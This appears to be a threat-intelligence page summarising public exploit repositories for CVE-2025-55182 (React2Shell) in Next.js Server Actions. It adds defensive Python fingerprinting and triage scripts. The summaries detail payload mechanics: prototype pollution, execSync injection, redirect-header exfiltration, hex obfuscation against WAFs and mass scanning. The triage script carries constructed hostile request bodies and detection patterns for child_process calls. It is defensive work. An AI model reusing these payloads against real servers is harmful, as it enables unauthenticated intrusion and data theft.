script name and linked advisory reference CVE-2025-55182. 
Overall, this is a real exploit PoC for pre-authentication web-based RCE against vulnerable React Server Components deployments, with basic but functional payload handling.
This repository is a small standalone Go exploit containing one executable source file (main.go), a README, and a license. It is not part of a larger exploitation framework. The code implements an interactive remote command execution client for CVE-2025-55182, described as a React Server Components / Next.js issue.
Structure and purpose:
- main.go: complete exploit implementation.
- README.md: usage instructions, affected versions, demo transcript, lab setup, and references.
- LICENSE: MIT license.
Main exploit flow:
1. Prompts the operator for a target host/URL.
2. Normalizes the target, defaulting to HTTPS and appending a trailing slash.
3. Performs a vulnerability check by sending a crafted multipart/form-data POST request containing a JavaScript gadget.
4. Determines success by inspecting the X-Action-Redirect response header for a /login?a= pattern.
5. If vulnerable, enters an interactive shell-like loop.
6. Each entered command is embedded into a JavaScript payload that invokes process.mainModule.require('child_process').execSync('<cmd>') on the remote Node.js server.
7. Command output is converted to a string, URL-encoded, and forced into a redirect digest targeting /login?a=<output>; the client then extracts and decodes that output from the X-Action-Redirect header.
Notable implementation details:
- Uses insecure TLS (InsecureSkipVerify=true), allowing exploitation of HTTPS targets with invalid/self-signed certificates.
- Disables automatic redirect following so the exploit can directly inspect redirect headers.
- Uses static headers Next-Action: x and X-Nextjs-Request-Id: b5dce965.
- Escapes backslashes, quotes, and backticks in operator-supplied commands before embedding them in the JavaScript payload.
Capabilities:
- Vulnerability detection/checking.
- Arbitrary command execution on the remote server.
- Interactive post-exploitation command loop.
- Retrieval of command output via header-based exfiltration.
Overall, this is a real, concise operational exploit rather than a mere detector. It provides a basic but functional interactive RCE workflow against a vulnerable web application.
This repository is a multi-implementation exploit toolkit for CVE-2025-55182, a claimed unauthenticated remote code execution issue in React Server Components / Next.js server actions caused by unsafe deserialization. The repo contains 6 files, among them a Nuclei template (CVE-2025-55182.yaml), a README, a Bash scanner/exploiter, a Go implementation, and a Python implementation. Because the repository includes a Nuclei template, it can be considered framework-associated, but the repo also ships standalone exploit clients. Main capability: all implementations send a crafted multipart/form-data POST request to the target root path (/), setting Next.js-specific headers such as Next-Action, X-Nextjs-Request-Id, and X-Nextjs-Html-Request-Id. The malicious form field contains JSON that abuses prototype/constructor resolution and injects JavaScript into the _response._prefix field. That JavaScript calls process.mainModule.require('child_process').execSync('<attacker command>') on the server, captures stdout, and forces a NEXT_REDIRECT exception whose digest embeds the command output in /login?a=<output>;307;. The client then parses the X-Action-Redirect response header to determine success and recover output. Repository structure and purpose: the Nuclei YAML is a detection/exploitation check that runs arithmetic commands via either Unix shell syntax or PowerShell and validates success by matching the redirect header. The Bash script is the most feature-rich component, supporting single-target mode and mass scanning from a list, automatic protocol normalization, temporary multipart body generation, output decoding, and saving vulnerable hosts to vulnerable_hosts.txt. The Python script is a simpler standalone exploit emphasizing safer JSON escaping and disabled TLS verification. The Go program provides a compilable high-performance client, also disabling TLS verification and refusing redirects so the header can be inspected directly.
Operationally, this is more than a detector: it supports arbitrary attacker-supplied commands and mass exploitation workflows. The README explicitly documents reconnaissance steps using subfinder, httpx, and nuclei, then exploitation with custom commands such as id, whoami, uname -a, and cat /etc/passwd. No hardcoded C2 or external callback infrastructure is present; the exploit is self-contained and uses the target application's own redirect header as the exfiltration channel.
This repository contains a single Python script, exploit.py, implementing a mass scanner and exploit tool for an alleged Next.js React Server Components/App Router remote code execution issue identified in the banner and comments as CVE-2025-55182. The script is not part of a larger exploit framework; it is a standalone threaded command-line tool. Structure and workflow: the script defines helper color output, a banner, URL extraction logic for piped input, and a NextExploiter class. The main() function accepts either a single URL, a file of URLs, or stdin pipeline input, then scans targets concurrently using ThreadPoolExecutor. It supports a configurable command payload, thread count, proxy, and verbose mode. There is a minor apparent coding error in the provided content: the argument-parser line that registers the proxy option is missing its "parser." prefix, so the script as shown would fail at startup, but the intended functionality is clear. Capabilities: first, it performs reconnaissance by issuing a GET request to each target and checking for Next.js fingerprints. It looks for the X-Powered-By: Next.js header and the /_next/static path in HTML to identify Next.js generally. It then distinguishes architecture by checking for __next_f, which it treats as App Router/RSC and therefore exploitable, versus __NEXT_DATA__, which it treats as legacy Pages Router and skips. If the target appears to be an App Router deployment, it proceeds to exploitation. Exploitation behavior: the trigger_rce() method constructs a multipart/form-data POST request to the fixed relative path /adfa on the target. The body contains a crafted serialized payload intended to reach JavaScript constructor functionality and execute arbitrary shell commands through Node.js child_process.execSync. The command is user-controlled via the -c/--cmd argument and defaults to id. The payload base64-encodes command output and throws it back in an error digest field.
The script then parses the HTTP response for a "digest" value, JSON-unescapes it, base64-decodes it, and prints the resulting command output as proof of successful RCE. Fingerprintable artifacts and target indicators include the relative exploit endpoint /adfa, the detection markers /_next/static, __next_f, __NEXT_DATA__, the X-Powered-By: Next.js header, and the custom Next-Action: x request header. The script also contains an example proxy endpoint http://127.0.0.1:8080 and uses a hardcoded Chrome-like User-Agent string. Overall, this is an operational exploit script rather than a mere detector: it includes both target identification logic and an active RCE payload with arbitrary command execution and output retrieval. It is designed for bulk internet-facing web target scanning and exploitation against Next.js applications using the App Router/RSC architecture.
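The fingerprinting logic this script and the CVE-2025-55182.py PoCs above perform (passive markers in the HTML, then an active GET with the RSC: 1 header, plus the __next_f versus __NEXT_DATA__ router distinction), combined into one exposure classifier as an added example that is not code from any of those repositories. It works on captured responses so it runs offline; the response records are constructed, the Flight-row regex is a heuristic of this example, and the result is an inventory bucket, not a vulnerability verdict, since a host serving RSC is only exposed if its React Server DOM package version is in the affected range.

```python
import re

# Heuristic for React Flight rows such as '0:["$","div",...]', '1:I[...]' or
# '2:E{"digest":...}'; an assumption of this example, not a documented grammar.
FLIGHT_ROW_RE = re.compile(r'^[0-9a-f]+:(?:\[|\{|"|[A-Z]{1,2}[\[{])', re.M)

# Markers that, on their own, identify Next.js (the probe result is added separately).
NEXTJS_EVIDENCE = ("x-powered-by:next.js", "/_next/static", "__next_f", "__NEXT_DATA__")


def header(headers, name):
    """Case-insensitive header lookup returning '' when absent."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return ""


def fingerprint(page, rsc_probe=None):
    """Classify a captured site response ({'headers': {...}, 'body': '...'}) and,
    optionally, the response to the same URL requested with the header RSC: 1.
    Returns whether it looks like Next.js, which router it appears to use, and
    whether the server actually answered the RSC probe with Flight content."""
    h, body = page.get("headers", {}), page.get("body", "")
    evidence = []
    if "next.js" in header(h, "x-powered-by").lower():
        evidence.append("x-powered-by:next.js")
    if "/_next/static" in body:
        evidence.append("/_next/static")
    if "react-server-dom-webpack" in body:
        evidence.append("react-server-dom-webpack")
    if "text/x-component" in header(h, "content-type"):
        evidence.append("content-type:text/x-component")
    router = "unknown"
    if "__next_f" in body:           # Flight bootstrap array: App Router
        evidence.append("__next_f")
        router = "app"
    elif "__NEXT_DATA__" in body:    # hydration blob: Pages Router
        evidence.append("__NEXT_DATA__")
        router = "pages"
    rsc_served = False
    if rsc_probe is not None:
        ph, pbody = rsc_probe.get("headers", {}), rsc_probe.get("body", "")
        ct = "text/x-component" in header(ph, "content-type")
        vary = "rsc" in [v.strip().lower() for v in header(ph, "vary").split(",")]
        rows = bool(FLIGHT_ROW_RE.search(pbody))
        evidence += [n for n, ok in (("probe:text/x-component", ct),
                                     ("probe:vary-rsc", vary),
                                     ("probe:flight-rows", rows)) if ok]
        rsc_served = ct and (vary or rows)
        if rsc_served:
            router = "app"
    nextjs = any(e in NEXTJS_EVIDENCE for e in evidence) or rsc_served
    return {"nextjs": nextjs, "router": router, "rsc_served": rsc_served,
            "evidence": evidence}


def exposure_tier(result):
    """Collapse a fingerprint into an inventory bucket: RSC-serving App Router
    hosts are the ones to check against the affected-version list first."""
    if result["rsc_served"] or result["router"] == "app":
        return "app-router-rsc"
    if result["nextjs"]:
        return "nextjs-other"
    return "not-nextjs"


# Constructed responses (not captured from any real host).
APP_PAGE = {"headers": {"Content-Type": "text/html; charset=utf-8", "X-Powered-By": "Next.js"},
            "body": '<script src="/_next/static/chunks/main-app.js"></script>'
                    '<script>self.__next_f.push([0])</script>'}
APP_PROBE = {"headers": {"Content-Type": "text/x-component", "Vary": "RSC, Next-Router-State-Tree"},
             "body": '0:["$","div",null,{"children":"hello"}]\n'}
PAGES_PAGE = {"headers": {"X-Powered-By": "Next.js"},
              "body": '<script id="__NEXT_DATA__" type="application/json">{"page":"/"}</script>'}
PAGES_PROBE = {"headers": {"Content-Type": "text/html"}, "body": "<!doctype html><html></html>"}
STATIC_PAGE = {"headers": {"Server": "nginx"}, "body": "<h1>hello</h1>"}

if __name__ == "__main__":
    for name, page, probe in (("app", APP_PAGE, APP_PROBE), ("pages", PAGES_PAGE, PAGES_PROBE),
                              ("static", STATIC_PAGE, None)):
        r = fingerprint(page, probe)
        print(name, exposure_tier(r), r["evidence"])
```

The probe result is weighted above the HTML markers on purpose: a reverse proxy can strip X-Powered-By and an App Router page can be served without the bootstrap script, but a text/x-component answer to an RSC: 1 request means the Flight endpoint itself is reachable from the network.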
This repository is an intentionally vulnerable local lab for CVE-2025-55182 targeting React Server Components / Next.js App Router Server Actions. It is not a scanner; it is a working exploit lab plus ready-made exploit requests. The repository structure is small and purpose-built: a minimal Next.js application in app/layout.tsx and app/page.tsx, containerization files (Dockerfile and docker-compose.yml), dependency manifests, and a burp-payloads/ directory containing seven raw HTTP exploit templates. The application itself is minimal. app/page.tsx defines a Server Action (labAction) behind a form on the root page, ensuring POST / with a valid Next-Action header behaves like a realistic target. The Dockerfile and compose file pin and expose a vulnerable stack: Next.js 15.1.0 with React/react-dom 19.2.0, running on port 3000 in a standalone production build. The README explains setup, confirms the target endpoint, and notes that the Next-Action identifier must usually be captured from a legitimate form submission because it may change between builds. The exploit capability is concentrated in the burp-payloads/*.http files. Each sends a crafted multipart/form-data POST / request with fields 0, 1, and 2 and abuses the RSC/Server Action processing path to reach JavaScript execution. The payloads demonstrate several post-exploitation primitives: 01-rce-id.http runs id; 02-rce-whoami.http runs whoami; 03-blind-oob-http.http performs an HTTP callback to a collaborator host with command output; 04-blind-dns.http triggers a DNS lookup for blind confirmation; 05-time-based-sleep.http executes sleep 10 for timing-based detection; 06-exfil-env.http captures environment variables; and 07-read-file.http reads /etc/passwd. Several payloads exfiltrate results by throwing a crafted NEXT_REDIRECT error whose digest redirects the client to /rce?out=<encoded data>. Overall, this is an operational proof-of-concept lab repository for local authorized testing of CVE-2025-55182. 
It provides a reproducible vulnerable target and multiple exploit templates showing direct RCE, blind OOB signaling, timing-based confirmation, environment disclosure, and file read against a Linux-based Node.js containerized deployment.
This repository is a standalone exploit project, not part of a larger exploitation framework. Its main purpose is to demonstrate and operationalize CVE-2025-55182, a claimed unauthenticated RCE in React Server Components / Next.js Server Actions caused by unsafe deserialization and prototype pollution. The repository contains three main parts: (1) exploit/ with the primary Python exploit react2shell.py and usage notes, (2) vulnerable-app/ with a deliberately vulnerable Next.js 15.0.0 + React 19.0.0 lab application, a curl-based exploit helper, and a restoration script, and (3) docs/analysis/ with markdown writeups covering root cause, payload anatomy, and timeline. The main exploit file is exploit/react2shell.py, a Python script using requests and argparse. It builds a multipart/form-data POST request to the target root path / with headers such as Next-Action: x, X-Nextjs-Request-Id, and X-Nextjs-Html-Request-Id. The payload embeds malicious JSON for the React Flight deserializer, including the prototype-pollution primitive "__proto__:then" and a _response._prefix JavaScript snippet that invokes child_process.execSync() on attacker-controlled commands. Output is transformed to fit header constraints and exfiltrated by throwing a NEXT_REDIRECT error whose digest contains /login?a=${res};307;, which the exploit then parses from the X-Action-Redirect response header. Capabilities exposed by the exploit go beyond a minimal PoC. The script supports a vulnerability check mode, single-command RCE, and an interactive shell. Documentation and visible code structure indicate four higher-level attack modules: deleting projects from the demo dashboard, defacing the website, stealing environment variables, and shutting down displayed servers. The exfiltration logic includes a line-by-line read technique using /tmp/stolen_env.txt to avoid header size limitations. 
The maturity is best described as OPERATIONAL: it provides a working payload and multiple post-exploitation workflows, but it is not packaged as a reusable framework module. The vulnerable-app directory is a self-contained Next.js lab target. app/actions.ts defines a server action, app/page.tsx is a dashboard-style UI, and package.json pins next 15.0.0 with react/react-dom 19.0.0. The included curl_id.sh reproduces the same exploit logic in bash/curl, again targeting the root path and parsing X-Action-Redirect. scripts/restore.sh restores app/page.tsx, app/actions.ts, and app/layout.tsx, optionally cloning https://github.com/zack0x01/vuln-app-CVE-2025-55182.git if needed, and cleans the .next cache. Overall, this is a real exploit repository with a Python RCE exploit as the primary artifact, supported by a demo target and academic documentation. The most important fingerprintable observables are the POST target /, the exfiltration redirect pattern /login?a=..., the custom Next.js headers, local lab URL http://localhost:3000, temporary file /tmp/stolen_env.txt, and restoration-related file paths within the vulnerable app.
This repository is a self-contained proof-of-concept for CVE-2025-55182 ('React2Shell'), an alleged unauthenticated RCE in React Server Components / Next.js server action deserialization. It is not part of a larger exploit framework. The repository contains one primary exploit script, poc.py, plus environment and target application files used to reproduce the issue locally. The main exploit logic is in poc.py, a Python 3 script using requests. It accepts a target URL and an arbitrary command, then sends a multipart/form-data POST to the target root path with the Next-Action header set. The payload for field '0' is a crafted JSON object representing a fake React Flight chunk. The exploit abuses property traversal through '__proto__' and 'constructor' to reach the JavaScript Function constructor during reviveModel processing. It then injects JavaScript that loads Node's child_process module and runs execSync on the attacker-supplied command. Output is exfiltrated by throwing an Error object with a digest property, which the script parses from the HTTP response body. Exploit capability: unauthenticated remote command execution against a vulnerable Node.js application using React Flight / Next.js server actions. The operator can run commands like 'id' or 'touch /tmp/pwned'. The PoC is operational rather than weaponized: it provides a working payload and command execution path, but customization is manual and limited to the command argument. Repository structure: README.md documents the vulnerability, affected versions, setup, and sample requests. flake.nix and flake.lock define a Nix development shell with Node.js, Yarn, Python, and requests. start.sh automates building and running the vulnerable container. 
The target/ directory contains a minimal vulnerable Next.js application: Containerfile builds a node:20-alpine image; package.json pins next 16.0.6 and react/react-dom 19.2.0; app/page.tsx defines a simple server action form that provides the server-side action surface; layout.tsx and config files support the app. This target app exists to demonstrate and validate the exploit locally on port 3000. Notable network and fingerprintable artifacts include POST requests to the application root '/', the required Next-Action header, the default local target http://localhost:3000, optional proxying through http://localhost:8080, and demonstration file paths such as /tmp/pwned. Overall, the repository's purpose is to demonstrate and reproduce a deserialization-to-RCE chain in vulnerable React/Next.js server action handling.
This repository is a small standalone exploit PoC consisting of one Python script and a README. The main file, CVE-2025-55182.py, is a multithreaded Python exploit targeting a claimed pre-authentication RCE in React Server Components / Next.js Server Actions. It is not part of a larger framework. The exploit’s purpose is to send a crafted multipart/form-data POST request that abuses RSC/Flight deserialization and prototype-chain manipulation to reach the JavaScript Function constructor, execute attacker-controlled JavaScript in the server’s Node.js context, and then exfiltrate results through a forged NEXT_REDIRECT digest. The payload generator supports two modes: exploit mode, which runs arbitrary OS commands via child_process.execSync, and check mode, which avoids command execution and instead returns a fixed marker to confirm likely reachability of the vulnerable code path. Repository structure is minimal: README.md documents the vulnerability claim, affected versions, usage examples, and output semantics; CVE-2025-55182.py contains all exploit logic, CLI parsing, payload construction, HTTP request generation, response parsing, batch processing, proxy support, and result logging. The script accepts either a single URL or a file of targets, supports concurrent scanning with ThreadPoolExecutor, optional HTTP/SOCKS proxying, timeout and TLS verification controls, and writes confirmed vulnerable hosts to an output file. Notable exploit capabilities include: arbitrary command execution on vulnerable Node.js-backed targets, extraction of command output, batch exploitation/checking across many hosts, and a non-destructive verification mode. Fingerprintable artifacts include the use of the Next-Action header, multipart/form-data requests, the redirect path /x?r= for exfiltration, and local file references such as targets.txt and results.txt. 
Overall, this is an operational PoC exploit rather than a mere detector, because it includes a working command-execution payload and output recovery channel.
The repository is a small standalone Python exploit project with two files: a README and a single executable script, rce_exploit.py. The script is the main entry point and implements batch exploitation against a list of web targets. It accepts a filename containing URLs and an operator-supplied command, normalizes targets to HTTP if no scheme is present, and sends a crafted multipart/form-data POST request to each target using the requests library with TLS verification disabled.

The exploit logic is in check_vulnerability(). It builds a JSON structure named crafted_chunk containing fields such as then, status, reason, value, and _response. The critical part is the _prefix field, which injects JavaScript intended to run in a Node.js server context: it calls process.mainModule.require('child_process').execSync() with the user-provided command and a 5-second timeout, converts the output to a string, and throws an error object whose digest property contains the command output. After the POST request, the script searches the response body for a "digest" field and treats its presence as evidence of successful code execution. If found, it prints the extracted output and marks the target as vulnerable. Because Next.js serializes error digests (including its own NEXT_REDIRECT digests) into action responses, the bare presence of a digest field is a weak success oracle; an operator should confirm that the extracted text is actual command output before counting a host as exploited.

Capabilities: the tool performs active remote exploitation rather than passive detection. It can execute arbitrary shell commands supplied by the operator on vulnerable targets and exfiltrate stdout through the HTTP response. It also supports batch processing of multiple targets from a file and provides simple CLI status output for vulnerable, non-vulnerable, timeout, and connection-error cases. There are no hardcoded external IPs, domains, or callback servers in the repository; network interaction is limited to direct POST requests to operator-supplied target URLs.

The exploit appears operational because it contains a complete request routine and a working payload path, but it is not part of a larger framework and does not provide payload management beyond a single command string.
This repository is a working proof-of-concept exploit for CVE-2025-55182, described as an unauthenticated RCE affecting React Server Components / Next.js Server Actions. The repo has two main parts: (1) a vulnerable demo application under next-app/ built with create-next-app and configured to run in Docker, and (2) a standalone exploit script at the repository root, poc.ts.

The vulnerable app is intentionally minimal. next-app/app/actions.ts defines a server action (testAction), and next-app/app/page.tsx renders a form bound to that action so Next.js emits a hidden $ACTION_ID_<40 hex> field in the HTML. The Dockerfile and docker-compose.yml package and expose the app on port 3000, making it easy to reproduce the issue locally.

The actual exploit logic is in poc.ts. It first performs a GET request to the base URL and extracts the Server Action ID from the HTML using a regex. It then sends a crafted multipart/form-data POST to the same base URL with the Next-Action header set to that action ID. The payload abuses React Flight chunk references, prototype traversal, thenable behavior, and a controlled _response/_formData gadget to reach Function construction and ultimately execute process.mainModule.require('child_process').execSync('<command>'). The command is user-supplied via CLI, escaped, and inserted into the payload, making this an operational RCE PoC rather than a simple detector.

Repository structure is straightforward: README.md contains a detailed vulnerability explanation, setup, and exploitation steps; poc.ts is the exploit entry point; thenable-test.js is a tiny helper/demo showing JavaScript thenable behavior; next-app/ contains the reproducible vulnerable target application and its containerization files. Overall, the repository's purpose is to demonstrate and validate unauthenticated remote code execution against vulnerable Next.js/React Server Components deployments.
Repository contains a single Python proof-of-concept exploit (rce.py) plus README and Apache-2.0 license. The PoC targets CVE-2025-55182 described as a React Server Components hydration/input-validation issue enabling prototype pollution using the key "$1:__proto__:then". The exploit crafts a manual multipart/form-data body that mimics an RSC request, sets a trigger header (Next-Action: x), and injects JavaScript into an RSC field (_response._prefix) that executes OS commands via Node.js: process.mainModule.require('child_process').execSync(<cmd>). Output is exfiltrated by intentionally throwing a NEXT_REDIRECT error whose digest encodes a redirect to /login?a=${res}; the script then parses the server’s X-Action-Redirect response header to recover the command output. Two strategies are implemented: 'standard' (literal 'child_process') and 'obfuscated' (hex-decoded module name via Buffer.from(...,'hex')) to evade basic WAF signatures. The exploit is network-based, requires only python3 + requests, disables TLS verification, and posts directly to the provided target URL (defaulting to https:// if no scheme is supplied).
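The repository summaries above repeatedly name the same request-level fingerprints: a Next-Action header on a multipart/form-data POST, a _prefix field carrying JavaScript, a "$1:__proto__:then" key, process.mainModule.require('child_process') with execSync, a NEXT_REDIRECT digest or X-Action-Redirect header used as the output channel, and, in rce.py, a hex-encoded module name via Buffer.from(..., 'hex') to slip past literal WAF signatures. The following is an added triage script, not code from this page or from any of the repositories described; it assumes you already have request and response headers and bodies as strings (from a proxy, WAF log, or packet capture) and scores them against those indicators, decoding hex Buffer literals first so the obfuscated variant is caught too. The sample requests and response are constructed for illustration, not captured traffic. A legitimate Server Action call has the same Next-Action plus multipart shape, so the header shape alone never raises the level; only payload indicators do.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Request-side indicators, each taken from the exploit descriptions on this page
# (field names, object keys and Node.js API calls the PoCs use).
REQUEST_INDICATORS: Dict[str, "re.Pattern"] = {
    "prefix_field":       re.compile(r'"_prefix"\s*:'),
    "proto_then_key":     re.compile(r'\$\d+:__proto__:then'),
    "proto_key":          re.compile(r'__proto__'),
    "mainmodule_require": re.compile(r'process\.mainModule\.require'),
    "child_process":      re.compile(r'child_process'),
    "exec_call":          re.compile(r'\b(?:execSync|spawnSync|exec|spawn)\s*\('),
    "next_redirect":      re.compile(r'NEXT_REDIRECT'),
}
# Buffer.from('<hex>', 'hex') is the obfuscation the rce.py summary describes.
HEX_LITERAL = re.compile(r"""Buffer\.from\(\s*['"]([0-9a-fA-F]+)['"]\s*,\s*['"]hex['"]\s*\)""")
# Indicators that on their own justify calling the request hostile.
STRONG = {"prefix_field", "proto_then_key", "mainmodule_require", "child_process"}


@dataclass
class Verdict:
    level: str                                  # "none", "low" or "high"
    reasons: List[str] = field(default_factory=list)


def decode_hex_literals(body: str) -> str:
    """Return body plus the decoded text of every hex Buffer literal, so the
    indicator regexes also fire on 'child_process' hidden as hex digits."""
    decoded = []
    for m in HEX_LITERAL.finditer(body):
        try:
            decoded.append(bytes.fromhex(m.group(1)).decode("utf-8", "replace"))
        except ValueError:       # odd-length or otherwise invalid hex: skip it
            continue
    return body + "\n" + "\n".join(decoded)


def inspect_request(headers: Dict[str, str], body: str) -> Verdict:
    """Classify one HTTP request. Next-Action plus multipart/form-data is how
    every legitimate Server Action is sent, so it is recorded as context only."""
    h = {k.lower(): v for k, v in headers.items()}
    action_shape = "next-action" in h and h.get("content-type", "").startswith("multipart/form-data")
    text = decode_hex_literals(body)
    hits = [name for name, rx in REQUEST_INDICATORS.items() if rx.search(text)]
    if HEX_LITERAL.search(body):
        hits.append("hex_obfuscated_literal")
    reasons = [f"indicator:{name}" for name in hits]
    if action_shape:
        reasons.append("shape:next-action multipart")
    if STRONG & set(hits):
        return Verdict("high", reasons)
    return Verdict("low" if hits else "none", reasons)


def inspect_response(headers: Dict[str, str], body: str) -> List[str]:
    """Spot the output-recovery channels the PoCs use: a NEXT_REDIRECT digest in
    the Flight response body and an X-Action-Redirect header. Both also occur
    on an ordinary redirect(), so they corroborate a flagged request only."""
    h = {k.lower(): v for k, v in headers.items()}
    seen = []
    if re.search(r'"digest"\s*:\s*"NEXT_REDIRECT', body):
        seen.append("body:NEXT_REDIRECT digest")
    if "x-action-redirect" in h:
        seen.append("header:X-Action-Redirect")
    return seen


def triage(req_headers, req_body, resp_headers, resp_body) -> Dict[str, object]:
    """Combine both sides: a high-level request followed by an output channel in
    the response is the pattern of a successful command-output exfiltration."""
    verdict = inspect_request(req_headers, req_body)
    channel = inspect_response(resp_headers, resp_body)
    return {
        "level": verdict.level,
        "reasons": verdict.reasons,
        "output_channel": channel,
        "likely_successful": verdict.level == "high" and bool(channel),
    }


# Constructed samples (not captured traffic). The action ID is a placeholder.
ACTION_HEADERS = {"Next-Action": "a" * 40, "Content-Type": "multipart/form-data; boundary=----b"}
BENIGN_BODY = (
    '------b\r\nContent-Disposition: form-data; name="1_name"\r\n\r\nalice\r\n'
    '------b\r\nContent-Disposition: form-data; name="0"\r\n\r\n["$K1"]\r\n------b--\r\n'
)
PLAIN_BODY = (
    '------b\r\nContent-Disposition: form-data; name="1"\r\n\r\n'
    '{"_prefix":"process.mainModule.require(\'child_process\').execSync(\'id\')"}\r\n------b--\r\n'
)
# Same idea with bracket access and the module name as hex (6368...7373 = child_process).
HEX_BODY = (
    '------b\r\nContent-Disposition: form-data; name="1"\r\n\r\n'
    '{"_prefix":"process[\'mainModule\'][\'require\']('
    'Buffer.from(\'6368696c645f70726f63657373\',\'hex\').toString()).execSync(\'id\')"}\r\n------b--\r\n'
)
RESP_HEADERS = {"X-Action-Redirect": "/login?a=uid%3D1000"}
RESP_BODY = '0:{"a":"$@1"}\n1:{"digest":"NEXT_REDIRECT;replace;/login?a=uid%3D1000;307;"}\n'

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("plain", PLAIN_BODY), ("hex", HEX_BODY)):
        print(label, triage(ACTION_HEADERS, body, RESP_HEADERS, RESP_BODY))
```

The hex sample deliberately avoids the literal strings process.mainModule.require and child_process, so it is caught only because decode_hex_literals() surfaces the decoded module name; a signature set that matches the raw body alone would miss it. Treat "high" as a reason to pull the full request and the application's process tree, not as proof of compromise, and tune the indicator list against your own application's legitimate action payloads before deploying it inline.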
Affected products & vendors
Recent activity
1,494 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Specific vulnerability referenced in a Qihoo360 post title as being used by APT-C-26 (Lazarus) together with the Copperhedge component in an attack campaign.
A vulnerability in the Next.js framework that was exploited in AI-assisted attack orchestration by the Bissa Scanner operation to automate large-scale scanning and credential theft.
A specific vulnerability referred to as React2Shell affecting Next.js endpoints and used as the core exploitation primitive in the Bissa Scanner mass-exploitation platform.
A Next.js 15.0.3 unauthenticated remote code execution issue in the React Server Components handler, described as involving prototype pollution and unsafe deserialization via the Next-Action header.